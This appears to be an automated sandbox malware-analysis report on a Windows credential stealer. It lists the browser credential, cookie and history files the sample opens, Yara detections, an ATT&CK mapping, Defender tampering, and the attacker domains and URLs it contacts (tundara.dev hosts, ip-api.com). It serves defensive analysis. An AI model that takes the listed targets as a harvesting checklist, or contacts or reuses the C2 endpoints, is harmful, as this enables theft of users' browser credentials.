              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\eventsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archivedJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.defaultJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.filesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\eventsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.filesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareportingJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackupsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_stateJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pingsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storageJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archivedJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\eventsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removedJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumpsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackupsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\defaultJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanentJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\gleanJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.filesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareportingJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\8pecxstudios\Cyberfox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporaryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.filesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pingsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.filesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumpsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backupsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chromeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\gleanJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Cerbfyne Stealer
              Source: Yara matchFile source: file.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.file.exe.7ff608fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.7ff608fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1232496497.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1408, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
              Windows Management Instrumentation              		1
              DLL Side-Loading              		11
              Process Injection              		1
              Masquerading              		1
              OS Credential Dumping              		21
              Security Software Discovery              		Remote Services31
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts112
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              File and Directory Permissions Modification              		31
              Input Capture              		1
              Process Discovery              		Remote Desktop Protocol11
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
              Disable or Modify Tools              		Security Account Manager41
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook41
              Virtualization/Sandbox Evasion              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Process Injection              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Network Configuration Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563338 Sample: file.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 92 38 w.tundara.dev 2->38 40 ip-api.com 2->40 42 b.tundara.dev 2->42 48 Multi AV Scanner detection for submitted file 2->48 50 Yara detected Cerbfyne Stealer 2->50 52 Sigma detected: Powershell Defender Disable Scan Feature 2->52 54 2 other signatures 2->54 8 file.exe 7 90 2->8         started        signatures3 process4 dnsIp5 44 ip-api.com 208.95.112.1, 49713, 80 TUT-ASUS United States 8->44 46 w.tundara.dev 51.210.106.44, 443, 49720, 49728 OVHFR France 8->46 36 C:\Windows\System32\drivers\etc\hosts, ASCII 8->36 dropped 56 Uses cmd line tools excessively to alter registry or file data 8->56 58 Tries to harvest and steal browser information (history, passwords, etc) 8->58 60 Modifies Windows Defender protection settings 8->60 62 2 other signatures 8->62 13 powershell.exe 23 8->13         started        16 powershell.exe 23 8->16         started        18 WMIC.exe 1 8->18         started        20 5 other processes 8->20 file6 signatures7 process8 signatures9 64 Loading BitLocker PowerShell Module 13->64 22 conhost.exe 13->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        30 conhost.exe 20->30         started        32 conhost.exe 20->32         started        34 2 other processes 20->34 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe24%ReversingLabsWin64.Trojan.GenSteal

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/reflect:0%Avira URL Cloudsafe
              https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi0%Avira URL Cloudsafe
              https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ=0%Avira URL Cloudsafe
              https://w.tundara.dev/ws?id=ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ=0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              b.tundara.dev
              		51.210.106.44
              		truefalse
                		high
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high
                  w.tundara.dev
                  		51.210.106.44
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ=false
                    • Avira URL Cloud: safe
                    		unknown
                    http://ip-api.com/json/false
                      		high
                      https://w.tundara.dev/ws?id=ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ=false
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.ebay.co.uk/file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFfile.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.ebay.de/file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://ocsp.thawte.com0file.exefalse
                                      		high
                                      https://www.amazon.com/file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.ctrip.com/file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/reflect:file.exefalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/Iconpowershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://twitter.com/file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://emojione.com/licensingColorfile.exefalse
                                                  		high
                                                  http://ip-api.com/json/DestroyEnvironmentBlockfile.exefalse
                                                    		high
                                                    https://discord.gg/tls:file.exefalse
                                                      		high
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.olx.pl/file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.youtube.com/file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFontsfile.exefalse
                                                              		high
                                                              https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mifile.exe, 00000000.00000002.1482903932.000000C000415000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://login.microsoftonline.comfile.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1489672991.000000C0012FF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bugzilla.mofile.exe, 00000000.00000002.1486338572.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1486338572.000000C000E7A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0file.exefalse
                                                                      		high
                                                                      https://www.zhihu.com/file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://cdn.discordapp.com/avatars/C:file.exefalse
                                                                          		high
                                                                          https://www.amazon.fr/file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
